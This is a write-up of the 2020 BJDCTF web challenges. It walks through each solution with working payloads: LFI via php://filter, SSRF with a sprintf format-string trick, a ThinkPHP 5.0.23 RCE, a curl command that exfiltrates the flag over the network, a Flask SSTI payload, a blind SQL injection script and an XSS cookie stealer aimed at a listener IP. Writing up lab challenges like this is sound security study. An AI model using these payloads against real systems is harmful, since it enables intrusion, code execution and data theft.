2020 2nd BJDCTF writeup

Fast hands got me two first bloods; after that I spent the whole time on the ASP deserialization challenge, but sadly I'm too weak and couldn't do it, argh.

Only the solutions to the web challenges are recorded.

文件探测 (File Probing)

home.php contains a file inclusion. The include appends ".php" only when the parameter ends in home or system, so a php://filter wrapper whose resource ends in one of those names passes every check and returns the source base64-encoded, e.g. ?file=php://filter/read=convert.base64-encode/resource=system (the wrapper contains none of the forbidden characters ^ ~ & | and neither of the words flag/admin; resource=home also works because only the exact string "home" is rejected):

home.php:

<?php

setcookie("y1ng", sha1(md5('y1ng')), time() + 3600);
setcookie('your_ip_address', md5($_SERVER['REMOTE_ADDR']), time()+3600);

if(isset($_GET['file'])){
    if (preg_match("/\^|\~|&|\|/", $_GET['file'])) {
        die("forbidden");
    }

    if(preg_match("/.?f.?l.?a.?g.?/i", $_GET['file'])){
        die("not now!");
    }

    if(preg_match("/.?a.?d.?m.?i.?n.?/i", $_GET['file'])){
        die("You! are! not! my! admin!");
    }

    if(preg_match("/^home$/i", $_GET['file'])){
        die("禁止套娃");
    }

    else{
        if(preg_match("/home$/i", $_GET['file']) or preg_match("/system$/i", $_GET['file'])){
            $file = $_GET['file'].".php";
        }
        else{
            $file = $_GET['file'].".fxxkyou!";
        }
        echo "现在访问的是 ".$file . "<br>";
        require $file;
    }
} else {
    echo "<script>location.href='./home.php?file=system'</script>";
}

system.php:

<?php

$filter1 = '/^http:\/\/127\.0\.0\.1\//i';
$filter2 = '/.?f.?l.?a.?g.?/i';

// $str2, $str3 and $str4 are not defined in the source as recovered
if (isset($_POST['q1']) && isset($_POST['q2']) && isset($_POST['q3']) ) {
    $url = $_POST['q2'].".y1ng.txt";
    $method = $_POST['q3'];

    $str1 = "~$ python fuck.py -u \"".$url ."\" -M $method -U y1ng -P admin123123 --neglect-negative --debug --hint=xiangdemei<br>";

    echo $str1;

    if (!preg_match($filter1, $url) ){
        die($str2);
    }
    if (preg_match($filter2, $url)) {
        die($str3);
    }
    if (!preg_match('/^GET/i', $method) && !preg_match('/^POST/i', $method)) {
        die($str4);
    }
    $detect = @file_get_contents($url, false);
    // $method is interpolated into the format string itself: a format-string injection
    print(sprintf("$url method&content_size:$method%d", $detect));
}

?>
Request that makes system.php fetch admin.php over the loopback interface (the cookies are the ones home.php set for our own address; no PHPSESSID is sent, so each request starts a fresh session):

Cookie:y1ng=8880cbd71721332a25aa6df7b12eb7ac53539100;your_ip_address=76d9f00467e5ee6abc3ca60892ef304e;

q1=&q2=http://127.0.0.1/admin.php?&q3=POST%s%

Why this body works: system.php appends ".y1ng.txt" to q2, so the trailing ? in q2 turns that suffix into a query string and the loopback request still hits admin.php; the URL starts with http://127.0.0.1/ (filter1) and contains no "flag" (filter2). q3 only has to begin with GET or POST, and the rest of it is smuggled into the sprintf() format: "$method%d" becomes "POST%s%%d", so %s prints $detect (the admin.php source, which highlight_file() returns because the request comes from 127.0.0.1) and %% escapes the trailing %d, which would otherwise need a second argument and make sprintf() fail.

Originally I got stuck here; later I noticed that "admin" was filtered, went to visit admin.php and, to my surprise, the file really exists (what a garbage wordlist I have). SSRF to admin.php:

<?php
error_reporting(0);
session_start();
$f1ag = 'f1ag{s1mpl3_SSRF_@nd_spr1ntf}'; //fake

function aesEn($data, $key)
{
    $method = 'AES-128-CBC';
    $iv = md5($_SERVER['REMOTE_ADDR'],true);
    return base64_encode(openssl_encrypt($data, $method,$key, OPENSSL_RAW_DATA , $iv));
}

function Check()
{
    if (isset($_COOKIE['your_ip_address']) && $_COOKIE['your_ip_address'] === md5($_SERVER['REMOTE_ADDR']) && $_COOKIE['y1ng'] === sha1(md5('y1ng')))
        return true;
    else
        return false;
}

if ( $_SERVER['REMOTE_ADDR'] == "127.0.0.1" ) {
    highlight_file(__FILE__);
} else {
    echo "<head><title>403 Forbidden</title></head><body bgcolor=black><center><font size='10px' color=white><br>only 127.0.0.1 can access! You know what I mean right?<br>your ip address is " . $_SERVER['REMOTE_ADDR'];
}


$_SESSION['user'] = md5($_SERVER['REMOTE_ADDR']);

if (isset($_GET['decrypt'])) {
    $decr = $_GET['decrypt'];
    if (Check()){
        $data = $_SESSION['secret'];
        include 'flag_2sln2ndln2klnlksnf.php';
        $cipher = aesEn($data, 'y1ng');
        if ($decr === $cipher){
            echo WHAT_YOU_WANT;
        } else {
            die('爬');
        }
    } else{
        header("Refresh:0.1;url=index.php");
    }
} else {
    //I heard you can break PHP mt_rand seed
    mt_srand(rand(0,9999999));
    $length = mt_rand(40,80);
    $_SESSION['secret'] = bin2hex(random_bytes($length));
}
?>

If the very first request of a session already carries ?decrypt=, the else branch that seeds $_SESSION['secret'] never runs, so $data is empty and aesEn() encrypts the empty string. The ciphertext then depends only on the fixed key 'y1ng' and on the IV, which is md5() of our own address, so the expected value can be computed locally (the mt_rand hint is a red herring). Check() still has to pass, so send the y1ng and your_ip_address cookies that home.php issued for the same address:

<?php
# error_reporting(0);
session_start();
$f1ag = 'f1ag{s1mpl3_SSRF_@nd_spr1ntf}'; //fake
$_SERVER['REMOTE_ADDR'] = '174.0.222.75'; // our own public address, as admin.php will see it

function aesEn($data, $key)
{
    $method = 'AES-128-CBC';
    $iv = md5($_SERVER['REMOTE_ADDR'],true);
    return base64_encode(openssl_encrypt($data, $method,$key, OPENSSL_RAW_DATA , $iv));
}

$_SESSION['user'] = md5($_SERVER['REMOTE_ADDR']);

if (isset($_GET['decrypt'])) {
    $decr = $_GET['decrypt'];

    $data = $_SESSION['secret']; // unset on a fresh session, so this is empty

    $cipher = aesEn($data, 'y1ng');
    echo $cipher; // the value to submit as ?decrypt=
    if ($decr === $cipher){
        echo 'WHAT_YOU_WANT';
    } else {
        die('爬');
    }
} else {
    //I heard you can break PHP mt_rand seed
    mt_srand(rand(0,9999999));
    $length = mt_rand(40,80);
    $_SESSION['secret'] = bin2hex(random_bytes($length));
}

Note: percent-encode the + when submitting (a literal + in a query string is decoded as a space, and the comparison is a strict ===).
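The same forgery can be reproduced without PHP. The Python below is an added example written for this page, not the author's script: it carries a standard-library-only AES-128 so it runs anywhere, assumes (from PHP's openssl_encrypt implementation) that the 4-byte key 'y1ng' is NUL-padded to 16 bytes, and uses the write-up's 174.0.222.75 as the REMOTE_ADDR that seeds the IV.

```python
import base64
import hashlib
import urllib.parse

# Minimal AES-128 (encrypt only) so the example runs with the standard library alone.

def _xtime(a):
    """Multiply by x in GF(2^8) with the AES polynomial."""
    a <<= 1
    return (a ^ 0x11B) & 0xFF if a & 0x100 else a

def _mul(a, b):
    """GF(2^8) multiplication."""
    r = 0
    while b:
        if b & 1:
            r ^= a
        a, b = _xtime(a), b >> 1
    return r

def _make_sbox():
    """S-box = affine transform of the multiplicative inverse (0 maps to 0x63)."""
    rotl = lambda x, n: ((x << n) | (x >> (8 - n))) & 0xFF
    box = []
    for a in range(256):
        inv = 1
        for _ in range(254):          # a^254 == a^-1 for a != 0, and 0 for a == 0
            inv = _mul(inv, a)
        box.append(inv ^ rotl(inv, 1) ^ rotl(inv, 2) ^ rotl(inv, 3) ^ rotl(inv, 4) ^ 0x63)
    return box

SBOX = _make_sbox()

def aes128_expand_key(key):
    """AES-128 key schedule: 16-byte key -> 176 bytes of round keys."""
    w, rcon = list(key), 1
    for i in range(16, 176, 4):
        t = w[i - 4:i]
        if i % 16 == 0:                         # RotWord, SubWord, Rcon on every 4th word
            t = [SBOX[b] for b in t[1:] + t[:1]]
            t[0] ^= rcon
            rcon = _xtime(rcon)
        w += [w[i - 16 + j] ^ t[j] for j in range(4)]
    return w

def aes128_encrypt_block(rk, block):
    """One AES-128 block encryption; state is column-major, index = row + 4*col."""
    s = [block[i] ^ rk[i] for i in range(16)]
    for rnd in range(1, 11):
        s = [SBOX[b] for b in s]                                            # SubBytes
        s = [s[r + 4 * ((c + r) % 4)] for c in range(4) for r in range(4)]  # ShiftRows
        if rnd < 10:                                                        # MixColumns
            m = []
            for c in range(4):
                a0, a1, a2, a3 = s[4 * c:4 * c + 4]
                m += [_mul(a0, 2) ^ _mul(a1, 3) ^ a2 ^ a3,
                      a0 ^ _mul(a1, 2) ^ _mul(a2, 3) ^ a3,
                      a0 ^ a1 ^ _mul(a2, 2) ^ _mul(a3, 3),
                      _mul(a0, 3) ^ a1 ^ a2 ^ _mul(a3, 2)]
            s = m
        s = [s[i] ^ rk[16 * rnd + i] for i in range(16)]                    # AddRoundKey
    return bytes(s)

def aes128_cbc_encrypt(key, iv, data):
    """CBC with PKCS#7 padding, as openssl_encrypt(..., OPENSSL_RAW_DATA, $iv) produces."""
    rk = aes128_expand_key(key)
    pad = 16 - len(data) % 16
    data += bytes([pad]) * pad
    out, prev = b"", iv
    for i in range(0, len(data), 16):
        prev = aes128_encrypt_block(rk, bytes(x ^ y for x, y in zip(data[i:i + 16], prev)))
        out += prev
    return out

def php_openssl_key(password, key_len=16):
    """Assumption from PHP's openssl_encrypt: a short key is NUL-padded to the cipher's
    key length and a long one truncated, so 'y1ng' becomes 'y1ng' followed by 12 NULs."""
    return password.encode()[:key_len].ljust(key_len, b"\0")

def forge_decrypt_param(remote_addr, secret=b"", key="y1ng"):
    """Reproduce aesEn($data, 'y1ng') for a session whose $_SESSION['secret'] was never
    seeded (so $data is empty) and return it ready to use as the ?decrypt= value."""
    iv = hashlib.md5(remote_addr.encode()).digest()   # md5($_SERVER['REMOTE_ADDR'], true)
    cipher = base64.b64encode(aes128_cbc_encrypt(php_openssl_key(key), iv, secret)).decode()
    # '+' would turn into a space in the query string, so percent-encode everything unsafe
    return urllib.parse.quote(cipher, safe="")

if __name__ == "__main__":
    # 174.0.222.75 is the address used in the write-up; substitute your own egress IP
    print("admin.php?decrypt=" + forge_decrypt_param("174.0.222.75"))
```

Send the printed value with the two cookies home.php issued for that same address and without a PHPSESSID cookie, so the session is new and the secret has never been generated.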

old hack

ThinkPHP 5.0.23 RCE: _method=__construct makes Request::method() call the constructor with the POST body, which sets filter to system, so the server variable REQUEST_METHOD is then run through system(). POST:

_method=__construct&filter=system&method=get&server[REQUEST_METHOD]=cat /flag

duang shell

<?php
error_reporting(0);
echo "how can i give you source code? .swp?!"."<br>";
if (!isset($_POST['girl_friend'])) {
    die("where is P3rh4ps's girl friend ???");
} else {
    $girl = $_POST['girl_friend'];
    if (preg_match('/\>|\\\/', $girl)) {       // blocks > and backslash
        die('just girl');
    } else if (preg_match('/ls|phpinfo|cat|\%|\^|\~|base64|xxd|echo|\$/i', $girl)) {
        echo "<img src='img/p3_need_beautiful_gf.png'> <!-- He is p3 -->";
    } else {
        //duangShell~~~~
        exec($girl);                             // output is never echoed
    }
}

exec() discards the output and the filter bans cat, base64, echo, $, %, ^, ~, > and backslash, so read the flag with sort instead of cat, spell base64 as 'base''64' (shell quote concatenation is still allowed), and exfiltrate the result as the path of a curl request to a host you control (xxx below); backticks are not filtered, so command substitution works:

curl xxx/`sort /flag|'base''64'`

fake google

Flask SSTI; the payload walks from the config object's __init__ to its module globals to reach os:

{{ config.__init__.__globals__['os'].popen('cat /flag').read() }}

Schrödinger

A baffling challenge that I solved in an equally baffling way:

Found this av number on Bilibili ("量力自学", very strong); open the last video, read the comments in reverse order, and the flag is there.

简单注入 (Simple Injection)

Scanning finds robots.txt, which points to a hint.txt:

Only u input the correct password then u can get the flag
and p3rh4ps wants a girl friend.

select * from users where username='$_POST["username"]' and password='$_POST["password"]';

Filtered:

union and & && select ' " - = like mid

A single backslash as the username escapes the quote that was meant to close its literal, so that literal now runs on to the quote that was meant to open the password value, and whatever is sent as password lands outside any string, i.e. as raw SQL. With = and like banned, compare with <> (or >) and use substr() instead of mid(); or is not banned, so || works as the connective:

select * from users where username='\' and password=' || sleep(3)#';
import requests

url = 'http://2d9c51e1-d6b9-466a-9232-cadb6c2ffeaf.node3.buuoj.cn'

flag = ''

for i in range(1, 100):
    print(i)
    found = False
    for j in range(33, 128):
        # username ends in a backslash so it swallows the closing quote; the password
        # field then continues the SQL. <> replaces the banned '=', substr() replaces mid().
        data = {"username": "\\", "password": "|| if(ascii(substr(password,{},1))<>{},0,sleep(3))#".format(i, j)}
        try:
            # a timeout means sleep(3) fired, i.e. the character at position i is chr(j)
            req = requests.post(url, data=data, timeout=2)
        except requests.exceptions.Timeout:
            flag += chr(j)
            found = True
            print(flag)
            break
    if not found:   # no character matched: we are past the end of the password
        break

print(flag)

Recovered password:

OhyOuFOuNdit

Log in with it to get the flag.

XSS之光 (Light of XSS)

.DS_Store leak gives the source:

<?php
$a = $_GET['yds_is_so_beautiful'];
$b = unserialize($a);

At first I thought a built-in class was needed, but there was nothing exploitable; later the challenge author hinted that stealing the Cookie is enough, so I built a cookie-stealing payload:

<?php

// exfiltrate document.cookie to a listener; the original payload put
// +btoa(document.cookie) outside the quoted src attribute, so the cookie never
// left the page -- this version builds the URL inside JavaScript instead
$a = "<script>new Image().src='http://174.1.70.235:666/?c='+btoa(document.cookie)</script>";
echo urlencode(serialize($a));

The listener never received anything, but the response headers carried a Cookie whose value was the flag.....

elementmaster

Only solved it in the last hour after seeing the hint... I wasn't observant enough, I'm too weak.

Relevant part of the index page:

<img src="mendeleev.jpg"></body>
<p hidden id="506F2E">I am the real Element Masterrr!!!!!!</p>
<p hidden id="706870">@颖奇L'Amore</p>

Hex-decoding the ids gives "Po." and "php", i.e. Po.php; visiting it returns a single ".", so every existing <element>.php prints one character of a file name. Brute-force the element-name dictionary the hint points to:

import requests

# element symbols in periodic-table order (the original list had Te twice; element 43 is Tc)
s = 'H, He, Li, Be, B, C, N, O, F, Ne, Na, Mg, Al, Si, P, S, Cl, Ar,K, Ca, Sc, Ti, V, Cr, Mn, Fe, Co, Ni, Cu, Zn, Ga, Ge, As, Se, Br, Kr, Rb, Sr, Y, Zr, Nb, Mo, Tc, Ru, Rh, Pd, Ag, Cd, In, Sn, Sb, Te, I, Xe, Cs, Ba, La, Ce, Pr, Nd, Pm, Sm, Eu, Gd, Tb, Dy, Ho, Er, Tm, Yb, Lu, Hf, Ta, W, Re, Os, Ir, Pt, Au, Hg, Tl, Pb, Bi, Po, At, Rn, Fr, Ra, Ac, Th, Pa, U, Np, Pu, Am, Cm, Bk, Cf, Es, Fm,Md, No, Lr,Rf, Db, Sg, Bh, Hs, Mt, Ds, Rg, Cn, Nh, Fl, Mc, Lv, Ts, Og, Uue'

dic = [e.strip() for e in s.split(',')]

flag = ''

for e in dic:
    url = 'http://7d4f0e93-48b2-46a3-8c2d-34428a31db6f.node3.buuoj.cn/{}.php'.format(e)
    print(url)
    res = requests.get(url)
    # every <Element>.php that exists prints one character of the file name, in element order
    if res.status_code != 404:
        flag += res.text
        print(flag)

print(flag)

Concatenating the characters gives the file name; visiting it yields the flag:

And_th3_3LemEnt5_w1LL_De5tR0y_y0u.php

假猪套天下第一 (Fake Pig Suit Is the Best)

Solved it in the last minute, hands shaking.... Everything that needs changing is marked with a # comment below.

GET /L0g1n.php HTTP/1.1
Host: node3.buuoj.cn:25575
Via: y1ng.vip # proxy header
Cache-Control: max-age=0
Origin: http://127.0.0.1
Upgrade-Insecure-Requests: 1
Client-ip: 127.0.0.1 # "local" access
User-Agent: The Commodore 64, also known as the C64 or the CBM 64, is an 8-bit home computer introduced in January 1982 by Commodore International (first shown at the Consumer Electronics Show, in Las Vegas, January 7-10, 1982).[4] It has been listed in the Guinness World Records as the highest-selling single computer model of all time,[5] with independent estimates placing the number sold between 10 and 17 million units.[2] Volume production started in early 1982, marketing in August for US$595 (equivalent to $1,576 in 2019).[6][7] Preceded by the Commodore VIC-20 and Commodore PET, the C64 took its name from its 64 kilobytes (65,536 bytes) of RAM. With support for multicolor sprites and a custom chip for waveform generation, the C64 could create superior visuals and audio compared to systems without such custom hardware. # not sure which part is the browser identifier, so I pasted the whole thing
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: gem-love.com # where the request "comes from"
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
From: root@gem-love.com # e-mail address
Cookie: PHPSESSID=3euk24qd394bk6rrv9lffgt6g7; time=4714846591 # a timestamp more than 99 years in the future

Reference list of HTTP headers:

https://www.cnblogs.com/zhouguowei/p/5320438.html